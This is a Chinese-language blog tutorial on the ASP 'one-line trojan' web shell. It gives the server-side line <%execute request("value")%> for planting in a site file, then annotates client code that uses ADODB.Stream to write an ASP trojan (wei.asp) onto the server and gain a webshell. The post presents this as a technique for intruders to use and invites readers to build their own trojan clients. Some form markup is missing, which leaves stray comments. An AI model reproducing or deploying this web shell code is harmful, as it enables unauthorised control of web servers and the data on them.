一句话木马原理

  “一句话木马”服务端

   就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为 <%execute request("value")%> 其中value可以自己修改

  “一句话木马”客户端

  ? 用来向服务端提交控制数据的,提交的数据通过服务端构成完整的asp功能语句并执行,也就是生成我们所需要的asp木马文件

  一句话木马客户端源文件:

  里面涉及到一些脚本知识,我就只讲解一下功能和简单注释,不详细讲了,大家只要注意几个注意点就行了

  ***********************************************************

  //后面是注释,学c的人应该很熟悉

  

中value而设定可以自行修改成<%execute request("p")%>相应这里的value值也必须改为p

  ?set lP=server.createObject("Adodb.Stream")

  //建立流对象,有了对象才可以使用它固有的属性和方法

  lP.Open //打开

  lP.Type=2 //以文本方式

  lP.CharSet="gb2312" //字体标准

  lP.writetext request("joeving")

  //取得木马内容 参数joeving可以自己定义 但必须和下面的name=joeving相对应

  lP.SaveToFile server.mappath("wei.asp"),2

  //将木马内容以覆盖文件的方式写入wei.asp,2就是已覆盖的方式,这里的wei.asp也是可以自己定义的,如定义成1.asp,但和下response.redirect"wei.asp"中wei.asp的保持一致

  lP.Close //关闭对象

  set lP=nothing //释放对象

  response.redirect "wei.asp"

  //转向生成的wei.asp 和上面的wei.asp相对应,也就是你熟悉的asp木马登陆界面

  

  //这段程序的功能:利用插入到数据库文件的<%execute request("value")%>这段代码执行第一个textarea中的内容,并将添加的木马内容写入和指向wei.asp,这样就相当于在服务器上建立了个asp木马文件,这样就可以取得webshell了

  

  //这段标签是你用来添加木马内容用的

  

  //提交

  程序的主要框架是

  

  //取得木马内容并用无组件上传技术在服务器端创建asp木马文件并显示

  //添加木马内容用的

  

  ***********************************************************

  其实都是些很简单的一些html和asp的知识,大家不妨自己写个自己的木马客户端~~~呵呵

 
目前共有0条评论
  • 暂无Trackback
你目前的身份是游客,评论请输入昵称和电邮!